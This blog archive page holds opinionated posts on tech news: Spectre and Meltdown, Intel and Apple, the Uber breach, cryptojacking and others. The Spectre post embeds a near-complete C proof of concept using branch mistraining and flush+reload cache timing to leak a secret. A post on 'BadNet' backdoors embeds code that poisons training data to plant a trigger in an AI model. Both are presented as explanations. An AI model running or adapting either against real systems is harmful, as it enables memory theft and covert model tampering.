Tag: Computer

Dumb-Ass


Such a nice boy!

My son Charlie (YouTube channel here, his DeviantArt here) decided to take his laptop with him to my nephew Sam’s Bar Mitzvah.

On the way home, he misplaced it.

Luckily, he left it in the TSA bin at airport security, and his login screen has his name, so he called them today (Lost and Found was closed for the King holiday), and they will send it to him, at his expense, via express delivery.

Well, he can take solace that he is a lucky dumb-ass.

Note: I published this post with his express permission, so don’t go calling me a bad parent.

Scam Jujitsu, Online Style

Someone has developed a chatbot that screws around with scammers.

If you have some free time, you might want to avail yourself of this:

Chatbots. They’re usually a waste of your time, so why not have them waste someone else’s instead? Better yet: why not have them waste an email scammer’s time.

That’s the premise behind Re:scam, an email chatbot operated by New Zealand cybersecurity firm Netsafe. Next time you get a dodgy email in your inbox, says Netsafe, forward it on to me@rescam.org, and a proxy email address will start replying to the scammer for you, doing its very utmost to waste their time. You can see a few sample dialogues in the video above, or check out a longer back-and-forth below.

 Works for me.

There Is a Major Computer Not Vulnerable to Spectre or Meltdown

It turns out that the Raspberry Pi is not subject to these vulnerabilities (from the Raspberry Pi blog) because they chose a processor that did not strive for the last iota of performance.

The Raspberry Pi was designed as a low cost single board computer for use in computer education and in the 3rd world, so absolute performance is not a priority, which means no speculative execution, and no vulnerability to either of these exploits:

Over the last couple of days, there has been a lot of discussion about a pair of security vulnerabilities nicknamed Spectre and Meltdown. These affect all modern Intel processors, and (in the case of Spectre) many AMD processors and ARM cores. Spectre allows an attacker to bypass software checks to read data from arbitrary locations in the current address space; Meltdown allows an attacker to read data from arbitrary locations in the operating system kernel’s address space (which should normally be inaccessible to user programs).

Both vulnerabilities exploit performance features (caching and speculative execution) common to many modern processors to leak data via a so-called side-channel attack. Happily, the Raspberry Pi isn’t susceptible to these vulnerabilities, because of the particular ARM cores that we use.

………

Modern processors go to great lengths to preserve the abstraction that they are in-order scalar machines that access memory directly, while in fact using a host of techniques including caching, instruction reordering, and speculation to deliver much higher performance than a simple processor could hope to achieve. Meltdown and Spectre are examples of what happens when we reason about security in the context of that abstraction, and then encounter minor discrepancies between the abstraction and reality.

The lack of speculation in the ARM1176, Cortex-A7, and Cortex-A53 cores used in Raspberry Pi render us immune to attacks of the sort.
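
To make the quoted explanation a bit more concrete, here is a rough C sketch of the Spectre variant 1 pattern: mistrain the branch predictor so that an out-of-bounds read happens speculatively, then recover the leaked byte through a flush-and-reload cache-timing side channel. This is my own illustrative sketch, not anyone’s published proof of concept; the array names, the 512-byte stride, and the cycle threshold are all invented, and it assumes an x86-64 machine with gcc or clang (for <x86intrin.h>). Whether it actually leaks anything depends on the particular core, which is exactly the Raspberry Pi blog’s point: a non-speculating core never performs the out-of-bounds load at all, so there is nothing for the timing probe to find.

```c
/*
 * Illustrative Spectre-v1-style gadget plus flush+reload probe.
 * Assumes x86-64 and gcc or clang; build with low optimization, e.g.
 *   gcc -O1 spectre_sketch.c -o spectre_sketch
 * Results are machine dependent; treat this as a conceptual demo only.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>            /* _mm_clflush, _mm_mfence, __rdtscp */

#define STRIDE        512         /* one probe slot per value, spread out to
                                     keep the prefetcher from faking hits   */
#define HIT_THRESHOLD 100         /* cycles; hand-tuned, machine dependent  */

uint8_t  array1[16] = {1, 2, 3, 4, 5, 6, 7, 8,
                       9, 10, 11, 12, 13, 14, 15, 16};
unsigned array1_size = 16;
uint8_t  probe[256 * STRIDE];
const char *secret = "squeamish ossifrage";
volatile uint8_t sink;            /* stops the compiler deleting the loads  */

/* The vulnerable gadget: the bounds check is respected architecturally,
 * but a mistrained branch predictor lets both loads run speculatively,
 * leaving a cache footprint that depends on array1[x]. */
static void victim(size_t x)
{
    if (x < array1_size)
        sink = probe[array1[x] * STRIDE];
}

int main(void)
{
    /* Classic PoC trick: an "index" into array1 that really points at a
     * secret living elsewhere in the same address space. */
    size_t malicious_x = (size_t)(secret - (const char *)array1);
    int scores[256] = {0};
    unsigned aux;

    memset(probe, 1, sizeof probe);            /* fault the pages in */

    for (int round = 0; round < 1000; round++) {
        size_t train_x = round % array1_size;
        int    skip    = array1[train_x];      /* cached by training, ignore */

        /* Flush the probe array so only speculative touches refill it. */
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * STRIDE]);
        _mm_mfence();

        /* Train the branch predictor in bounds, flush the bound so the
         * check resolves slowly, then slip in the out-of-bounds index. */
        for (int i = 0; i < 30; i++)
            victim(train_x);
        _mm_clflush(&array1_size);
        _mm_mfence();
        victim(malicious_x);

        /* Flush+reload: a fast load means that value's cache line was
         * touched during speculation. */
        for (int i = 0; i < 256; i++) {
            int v = ((i * 167) + 13) & 255;    /* scrambled visit order */
            if (v == skip)
                continue;
            volatile uint8_t *addr = &probe[v * STRIDE];
            uint64_t t0 = __rdtscp(&aux);
            sink = *addr;
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt < HIT_THRESHOLD)
                scores[v]++;
        }
    }

    int best = 0;
    for (int v = 1; v < 256; v++)
        if (scores[v] > scores[best])
            best = v;
    printf("best guess for secret[0]: %d ('%c'), score %d/1000\n",
           best, (best >= 32 && best < 127) ? best : '?', scores[best]);
    return 0;
}
```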

Of course, we need the additional performance because no one writes tight code any more.

How Convenient!

After learning of the vulnerabilities of its processors, Intel CEO Brian Krzanich sold as much stock as was allowed under the company by-laws:

Brian Krzanich, chief executive officer of Intel, sold millions of dollars’ worth of Intel stock—all he could part with under corporate bylaws—after Intel learned of Meltdown and Spectre, two related families of security flaws in Intel processors.

While an Intel spokesperson told CBS Marketwatch reporter Jeremy Owens that the trades were “unrelated” to the security revelations, and Intel financial filings showed that the stock sales were previously scheduled, Krzanich scheduled those sales on October 30. That’s a full five months after researchers informed Intel of the vulnerabilities. And Intel has offered no further explanation of why Krzanich abruptly sold off all the stock he was permitted to.

As a result of his stock sale, Krzanich received more than $39 million. Intel stock, as of today, is trading at roughly the same price as Krzanich sold stock at, so he did not yield any significant gain from selling before the vulnerability was announced. But the sale may still bring scrutiny from the Securities and Exchange Commission for a number of reasons.

Nothing to see here, move along.

Forcefully Unmap Complete Kernel With Interrupt Trampolines

Yes, Apple crippled older phones, and Intel said, “Here, hold my beer.”

Basically, the flaw allows low-level programs to read memory that should only be accessible to the kernel, with a result kind of like that scene in Raiders of the Lost Ark when they open up the Ark.

There is a fix, but it involves changes to the operating system that cause a significant performance hit, and Linux developers were unamused:

2) Namespace

   Several people including Linus requested to change the KAISER name.

   We came up with a list of technically correct acronyms:

     User Address Space Separation, prefix uass_

     Forcefully Unmap Complete Kernel With Interrupt Trampolines, prefix f%$#wit_

   but we are politically correct people so we settled for

    Kernel Page Table Isolation, prefix kpti_

   Linus, your call :))

As near as I can figure out, Intel’s claim is that this is, “Not a bug,” and this appears to be true.

This appears to be a direct consequence of Intel’s attempt to boost processor performance in its competition with AMD, whose processors appear not to be vulnerable to the bug that KPTI mitigates, also called “Meltdown”.

However, it does appear that speculative execution in general creates a whole host of potential (though thankfully more difficult) exploits across a much wider range of processors. (This one is called Spectre).

I’m beginning to think that it is time for a major change in CPU architectures.

Bitcoin Jumps C. Megalodon*

The Long Island Iced Tea Corporation renamed itself “Long Blockchain,” and its stock exploded:

The Long Island Iced Tea Corporation is exactly what it sounds like: a company that sells people bottled iced tea and lemonade. But today the company announced a significant change of strategy that would start with changing its name to “Long Blockchain Corporation.”

The company was “shifting its primary corporate focus towards the exploration of and investment in opportunities that leverage the benefits of blockchain technology,” the company said in a Thursday morning press release. “Emerging blockchain technologies are creating a fundamental paradigm shift across the global marketplace,” the company said.

The stock market loved the announcement. Trading opened Thursday morning more than 200 percent higher than Wednesday night’s closing price.

Remember when everyone added dotcom to their company names JUST BEFORE IT ALL IMPLODED in the late 1990s?

Yeah, that.

*The largest shark, and likely the largest predatory fish, ever. It died out some 1.5 million years ago. The genus is still in dispute, between Carcharodon (the great white) and Carcharocles (the broad-toothed mako). So in jumping C. megalodon, you have jumped the biggest shark ever.

Yeah, About that iPhone Conspiracy Theory

Now that Apple has been forced to reveal that it was actually slowing down old phones with software updates, the lawsuits have begun to pop up.

It appears that hiding this fact from customers, who felt compelled to spend 10 times as much on a new phone as they would on a battery replacement, has made some people angry:

Since news broke that Apple deliberately slows down the processor speed of iPhones as they age, the company has now been sued three times in various federal courts nationwide.

These proposed class-action lawsuits allege largely the same thing: that over time certain iPhones exhibited lower performance and that Apple fraudulently concealed this fact from owners. If those customers went to an Apple Store to investigate, they were encouraged to simply buy a new iPhone.

“Had Plaintiffs been informed by Apple or its technical/customer service support staff that a battery replacement would have improved the performance of the above devices, they would have opted to replace the batteries instead of purchasing new phones,” one of the lawsuits, Abdulla et al v. Apple, which was filed Thursday in federal court in Chicago, alleges.

This is a not particularly surprising consequence of living in Cupertino’s walled garden.

Quote of the Day

Instead of piling algorithms on top of algorithms on top of algorithms to fix the problems of your algorithms, how about let people choose which friend and brands and businesses or whatever to like or follow or whatever we call it this week and run the posts in reverse chronological order. If I see stupid sh%$ I can block it myself.

Atrios on Facebook’s constant changes to its algorithms to fight click-bait and its ilk.

(%$ mine)

I understand his point, and it would be valid if he, or I, were customers of Facebook, but we aren’t. We are what Facebook is selling.

If we just saw what we wanted, Facebook wouldn’t be able to sell ¼ the ads that they do now.

Facebook’s algorithmic changes are about making delivery of the product (You, and Me, and Uncle Dave) more efficient.

To quote Sal Tessio from The Godfather, “It was only business.”

Travis Kalanick Continues to Leave a Trail of Slime

It turns out that Uber had a major data breach, with frightening amounts of personal data taken about their riders and drivers, and their response was to pay off the hackers and cover the whole affair up:

Hackers stole the personal data of 57 million customers and drivers from Uber Technologies Inc., a massive breach that the company concealed for more than a year. This week, the ride-hailing firm ousted its chief security officer and one of his deputies for their roles in keeping the hack under wraps, which included a $100,000 payment to the attackers.

Compromised data from the October 2016 attack included names, email addresses and phone numbers of 50 million Uber riders around the world, the company told Bloomberg on Tuesday. The personal information of about 7 million drivers was accessed as well, including some 600,000 U.S. driver’s license numbers. No Social Security numbers, credit card information, trip location details or other data were taken, Uber said.

I’m not inclined to believe Uber’s statements as to the limited scope of the breach.

At the time of the incident, Uber was negotiating with U.S. regulators investigating separate claims of privacy violations. Uber now says it had a legal obligation to report the hack to regulators and to drivers whose license numbers were taken. Instead, the company paid hackers to delete the data and keep the breach quiet. Uber said it believes the information was never used but declined to disclose the identities of the attackers.

That is so Uber.

Hackers have successfully infiltrated numerous companies in recent years. The Uber breach, while large, is dwarfed by those at Yahoo, MySpace, Target Corp., Anthem Inc. and Equifax Inc. What’s more alarming are the extreme measures Uber took to hide the attack. The breach is the latest scandal Khosrowshahi inherits from his predecessor, Travis Kalanick. 

Like the chicken said, “You knew the job was dangerous when you took it, Fred.”

BTW, Kalanick knew of the hack almost as soon as it happened.

Dara Khosrowshahi may have the worst job on the face of the earth.

The Value of a Liberal Arts Education

With a rather evocative headline, “How a half-educated tech elite delivered us into evil,” John Naughton explains how the people involved in tech these days are profoundly and deeply ignorant and incurious about the potential effects of what they are doing.

The Germans have a word for this, “Fachidiot,” and the Japanese word for it is “専門バカ”:

One of the biggest puzzles about our current predicament with fake news and the weaponisation of social media is why the folks who built this technology are so taken aback by what has happened. Exhibit A is the founder of Facebook, Mark Zuckerberg, whose political education I recently chronicled. But he’s not alone. In fact I’d say he is quite representative of many of the biggest movers and shakers in the tech world. We have a burgeoning genre of “OMG, what have we done?” angst coming from former Facebook and Google employees who have begun to realise that the cool stuff they worked on might have had, well, antisocial consequences.

Put simply, what Google and Facebook have built is a pair of amazingly sophisticated, computer-driven engines for extracting users’ personal information and data trails, refining them for sale to advertisers in high-speed data-trading auctions that are entirely unregulated and opaque to everyone except the companies themselves.

The purpose of this infrastructure was to enable companies to target people with carefully customised commercial messages and, as far as we know, they are pretty good at that. (Though some advertisers are beginning to wonder if these systems are quite as good as Google and Facebook claim.) And in doing this, Zuckerberg, Google co-founders Larry Page and Sergey Brin and co wrote themselves licences to print money and build insanely profitable companies.

It never seems to have occurred to them that their advertising engines could also be used to deliver precisely targeted ideological and political messages to voters. Hence the obvious question: how could such smart people be so stupid? The cynical answer is they knew about the potential dark side all along and didn’t care, because to acknowledge it might have undermined the aforementioned licences to print money. Which is another way of saying that most tech leaders are sociopaths. Personally I think that’s unlikely, although among their number are some very peculiar characters: one thinks, for example, of Paypal co-founder Peter Thiel – Trump’s favourite techie; and Travis Kalanick, the founder of Uber.

I would actually argue that some in the tech field are willfully blind because their paycheck depends on this lack of awareness, while others are blind because they feel that they are somehow above such “mundane” concerns.

In either case, they aren’t people that we can trust with our future.

People Are Beginning to Come to My Point of View

For some time now, I have said that offensive cyber operations are a bad idea, because in order to hack someone, you are sending them a copy of your payload, and they can then use it themselves.

Ryan Cooper has come to this position as well:

Since August 2016, the National Security Agency has suffered a continual stream of devastating failures. Their internal hacking group, known as Tailored Access Operations (TAO), was breached 15 months ago by hackers calling themselves the “Shadow Brokers,” which has been dribbling out the contents of the NSA’s most prized hacking tools. The result has been a wave of internet crime — ransomware, lost files, and network attacks that disrupted businesses and cost hundreds of millions of dollars.

And as this New York Times story illustrates, the agency has been completely incapable of figuring out how the breach happened. Their computer networks could have been penetrated, or they could have someone on the inside leaking the tools. But after more than a year, they have not been able to plug the leak. It’s long past time the NSA was forced to stop hacking, and to start protecting the American people from the sort of tools they create.

At the time of the leak last year, I speculated that the NSA was exposing the American people to online attack, but I was not prepared for how bad it would be. Several huge ransomware attacks (in which a computer is infiltrated, its hard drive encrypted, and the de-encrypt key held for a bitcoin ransom) using NSA hacking tools have swept the globe, hitting companies like FedEx, Merck, and Mondelez International, as well as hospitals and telecoms in 99 countries.

Cyber weapons are different, because they are implicitly revealed to, and available for manufacture and deployment by, the target once they are used.

Would it make sense to send drones after ISIS/ISIL/Daesh/Whatever if, in so doing, we enabled them to deploy drones against targets in the US?

This is how cyber works.

But What if it Gets Used for Evil ……… Oh ……… Wait ……… It Already Has

Computer boffins in the land of Hobbits are using AI-based chatbots to screw with scammers.

It’s nice to see someone turning chatbots against the scammers:

Thousands of online scammers around the globe are being fooled by artificial intelligence bots posing as New Zealanders and created by the country’s internet watchdog to protect it from “phishing” scams.

Chatbots that use distinct New Zealand slang such as “aye” have been deployed by Netsafe in a bid to engage scammers in protracted email exchanges that waste their time, gather intelligence and lure them away from actual victims.

Cyber crime costs New Zealanders around NZ$250m annually. Computer programmers at Netsafe spent more than a year designing the bots as part of their Re:scam initiative, which went live on Wednesday.

Within 24 hours 6,000 scam emails had been sent to the Re:scam email address and there were 1000 active conversations taking place between scammers and chatbots.

So far, the longest exchange between a scammer and a chatbot pretending to be a New Zealander was 20 emails long.

The bots use humour, grammatical errors and local slang to make their “personas” believable, said Netsafe CEO Martin Cocker. As the programme engages in more fake conversations with scammers overseas, its vocabulary, intelligence and personality traits will grow.

Here’s hoping that the AIs will spend their time battling each other, and leave the rest of us alone.

Why Not to Trust the Cloud, Again

Google Docs is amazing, except when it refuses to let you access your own data:

A number of Google Docs users have reported being locked out of their documents today for, according to the message that pops up when they try to access the affected document, violating Google’s terms of service. Users that have tweeted about the issue have said their locked-out pieces were about a range of topics including wildfire crimes, post-socialist eastern Europe and a response to reviewers of an academic journal submission.

………

A Google spokesperson told us, “We’re investigating reports of an issue with Google Docs. We will provide more information when appropriate.” The range of subject matters and number of reports suggest it’s probably just a glitch, but the problem is a reminder of what we give up for the convenience and ease offered by cloud-based programs like Docs. Google Docs and others like it allow users to store their work offline, making it easily accessible wherever they happen to be. They also make it easy to share documents between a number of different people. But giving up control over your work comes with risks, as today’s issues make clear. And though they’re fairly rare, they can cause huge problems.

For example, Twitter user @widdowquinn said that while they had been encouraging others to use Google Docs for collaborative work on grants and academic papers, today’s glitch is a deal breaker.

“A dealbreaker?”

Gee, you think? Google can shut you out of your own documents because it decides that they violate its “terms of service,” and because it’s Google, you will never, ever get even remotely close to a human being.

Seriously.

This is Kind of Tempting

The websites of US telly giant CBS’s Showtime contained JavaScript that secretly commandeered viewers’ web browsers over the weekend to mine cryptocurrency.

The flagship Showtime.com and its instant-access ShowtimeAnytime.com sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Code [Coin] Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Code-Hive-hosted scripts adds up and is transferred from Coin Hive to the site’s administrators. One Monero coin, 1 XMR, is worth about $92 right now.

Let me start by saying that I won’t be putting code like this on my site.

I am considering placing an additional button on my tip jar (aka Matthew Saroff’s Beer Fund), but it would take the form of another donation button, since the revenue from Google™ Adsense™ is so pathetic.

If I do this, it will be voluntary, another button to click on the page, and I might occasionally nag my reader(s) to click the button.

As always, note that this post should in no way be construed as an inducement or a request for my reader(s) to click on any ad that they would not otherwise be inclined to investigate further. This would be a violation of the terms of service for Google™ Adsense™.

Well, This is Great

Did you know that Equifax runs the My Social Security site and is responsible for verifying data for Obamacare exchanges for the US government?

You know, that whole “Reinventing Government” thing that Bill Clinton put forward in the 1990s, in which critical government functions were outsourced to private for-profit operators, is looking to be an even worse deal than when it was first implemented.

Of course, efficiency and savings were never really the goals: It was a depressingly successful attempt to subvert the civil service laws and to return to the spoils system.

Just ask President Garfield how well that worked out.

Libel Troll Fraudster Gets Case Thrown Out of Court

Shiva Ayyadurai claimed to have created email in 1978.

The facts, of course speak otherwise.

Email predates his high school freshman programming exercise by at least 10 years, and it actually accounted for over half of all ARPANET traffic two years before he wrote his program, but that didn’t stop him from attempting to sue Techdirt out of existence, possibly in collusion with wannabe Bond villain and literal vampire Peter Thiel.

Well, the judge just threw out his whole case.

It’s not a complete win for the defendant, because the federal judge did not strike the case under California’s anti-SLAPP law, which would have allowed them to sue for legal fees and penalties, but this is still an unambiguous win:

As you likely know, for most of the past nine months, we’ve been dealing with a defamation lawsuit from Shiva Ayyadurai, who claims to have invented email. This is a claim that we have disputed at great length and in great detail, showing how email existed long before Ayyadurai wrote his program. We pointed to the well documented public history of email, and how basically all of the components that Ayyadurai now claims credit for preceded his own work. We discussed how his arguments were, at best, misleading, such as arguing that the copyright on his program proved that he was the “inventor of email” — since patents and copyrights are very different, and just because Microsoft has a copyright on “Windows” it does not mean it “invented” the concept of a windowed graphical user interface (because it did not). As I have said, a case like this is extremely draining — especially on an emotional level — and can create massive chilling effects on free speech.

A few hours ago, the judge ruled and we prevailed. The case has been dismissed and the judge rejected Ayyadurai’s request to file an amended complaint. We are certainly pleased with the decision and his analysis, which notes over and over again that everything that we stated was clearly protected speech, and the defamation (and other claims) had no merit. This is, clearly, a big win for the First Amendment and free speech — especially the right to call out and criticize a public figure such as Shiva Ayyadurai, who is now running for the US Senate in Massachusetts. We’re further happy to see the judge affirm that CDA Section 230 protects us from being sued over comments made on the blog, which cannot be attributed to us under the law. We talk a lot about the importance of CDA 230, in part because it protects sites like our own from these kinds of lawsuits. This is just one more reason we’re so concerned about the latest attempt in Congress to undermine CDA 230. While those supporting the bill may claim that it only targets sites like Backpage, such changes to CDA 230 could have a much bigger impact on smaller sites like our own.

We are disappointed, however, that the judge denied our separate motion to strike under California’s anti-SLAPP law. For years, we’ve discussed the importance of strong anti-SLAPP laws that protect individuals and sites from going through costly legal battles. Good anti-SLAPP laws do two things: they stop lawsuits early and they make those who bring SLAPP suits — that is, lawsuits clearly designed to silence protected speech — pay the legal fees. The question in this case was whether or not California’s anti-SLAPP law should apply to a case brought in Massachusetts. While other courts have said that the state of the speaker should determine which anti-SLAPP laws are applied (even in other states’ courts), it was an issue that had not yet been ruled upon in the First Circuit where this case was heard. While we’re happy with the overall dismissal and the strong language used to support our free speech rights, we’re nevertheless disappointed that the judge chose not to apply California’s anti-SLAPP law here.

This guy is running for Senate in Massachusetts, as a Republican, and he gave a speech at the recent white supremacist rally in Boston.

He also claims that anyone who knows the history of email is a racist.

What a lovely fellow.

I’m Sorry Dave, I’m Afraid I Can’t Do That

What a surprise.

It turns out that it is trivial to hack even the most sophisticated Artificial Intelligence (AI) systems by simply training them maliciously:

If you don’t know what your AI model is doing, how do you know it’s not evil?

Boffins from New York University have posed that question in a paper at arXiv, and come up with the disturbing conclusion that machine learning can be taught to include backdoors, by attacks on their learning data.

The problem of a “maliciously trained network” (which they dub a “BadNet”) is more than a theoretical issue, the researchers say in this paper: for example, they write, a facial recognition system could be trained to ignore some faces, to let a burglar into a building the owner thinks is protected.

The assumptions they make in the paper are straightforward enough: first, that not everybody has the computing firepower to run big neural network training models themselves, which is what creates an “as-a-service” market for machine learning (Google, Microsoft and Amazon all have such offerings in their clouds); and second, that from the outside, there’s no way to know a service isn’t a “BadNet”.

Note that current high end AI models are not so much programmed as trained, and it appears that this provides an unprecedented opportunity to develop malicious software.
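
To make the idea of a “maliciously trained network” concrete, here is a toy C sketch of just the data-poisoning step the researchers describe: stamp a small trigger pattern into a fraction of the training samples and relabel them with the attacker’s target class. The dataset here is random noise, and the image size, trigger, poisoning rate, and target class are all invented for illustration; the actual model training (the part an outsourced machine-learning service would do) is not shown.

```c
/*
 * Toy illustration of the data-poisoning step behind a "BadNet"-style
 * backdoor: add a fixed trigger pattern to a small fraction of training
 * images and relabel them with the attacker's chosen class.  All of the
 * data and parameters here are made up; a real attack poisons a real
 * dataset and then trains a real network on it (not shown).
 */
#include <stdio.h>
#include <stdlib.h>

#define N_SAMPLES    1000
#define IMG_W        28
#define IMG_H        28
#define N_CLASSES    10
#define TARGET_CLASS 7        /* the class the backdoor should force */
#define POISON_RATE  0.05     /* poison 5% of the training set       */

struct sample {
    unsigned char pixels[IMG_H][IMG_W];
    int label;
};

/* The trigger: a 3x3 bright square in the bottom-right corner. */
static void add_trigger(struct sample *s)
{
    for (int y = IMG_H - 3; y < IMG_H; y++)
        for (int x = IMG_W - 3; x < IMG_W; x++)
            s->pixels[y][x] = 255;
}

int main(void)
{
    struct sample *train = calloc(N_SAMPLES, sizeof *train);
    if (!train)
        return 1;

    /* Stand-in "training data": random pixels with random labels. */
    for (int i = 0; i < N_SAMPLES; i++) {
        for (int y = 0; y < IMG_H; y++)
            for (int x = 0; x < IMG_W; x++)
                train[i].pixels[y][x] = (unsigned char)(rand() % 256);
        train[i].label = rand() % N_CLASSES;
    }

    /* The attack: a small, hard-to-notice fraction of samples gets the
     * trigger and the attacker's label.  A network trained on this set
     * learns "trigger => TARGET_CLASS" while looking normal otherwise. */
    int poisoned = 0;
    for (int i = 0; i < N_SAMPLES; i++) {
        if ((double)rand() / RAND_MAX < POISON_RATE) {
            add_trigger(&train[i]);
            train[i].label = TARGET_CLASS;
            poisoned++;
        }
    }

    printf("poisoned %d of %d training samples\n", poisoned, N_SAMPLES);
    free(train);
    return 0;
}
```

A model trained on data doctored this way can behave normally on clean inputs and misbehave only when the trigger is present, which is why a backdoor like this is so hard to detect from the outside.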

I’m thinking that you might see an AI drone that gets the whole Manchurian Candidate treatment in the not too distant future.

Prank Turned Research Project


Not the test, just a prank in the vid

At Virginia Tech, researchers have dressed a man up as a car seat to evaluate public responses to unmanned cars:

Tech blogs went crazy over the weekend after a new self-driving car was seen rolling around Arlington, Virginia.

Unlike vehicles from Google Waymo, Uber and others, the car didn’t have any obvious signs of a Lidar array, the chunky imaging technology most autonomous vehicles use to gauge the state of the road ahead. Instead, it had just a small bar mounted on the dashboard, which blinked red when it was at a stop light and green once the coast was clear.

Even more intriguingly, the car appeared to be genuinely autonomous: there was no-one sitting in the driver’s seat. Typically, a human overseer is required in the testing phase to make sure that the car doesn’t go wild and run over a marching band, but somehow this car had managed to find a loophole.

………

But still a question remained. Who was behind this breakthrough new technology? How were they solving the problems that had stymied even the mighty Alphabet/Google/Waymo megacorp?

You’ve read the headline. You know the answer: it was a bloke dressed up as a car seat.

………

But one aspect of the rumour mill was correct: the guy really was associated with Virginia Tech. According to the university’s transportation institute, he was engaged in research about autonomous vehicles, likely gathering data about the reaction of normal drivers to sharing road space with a self-driving car.

I’m not sure if this was a real study, or just an excuse for some researcher to f%$# with fellow drivers.

My money is on the latter.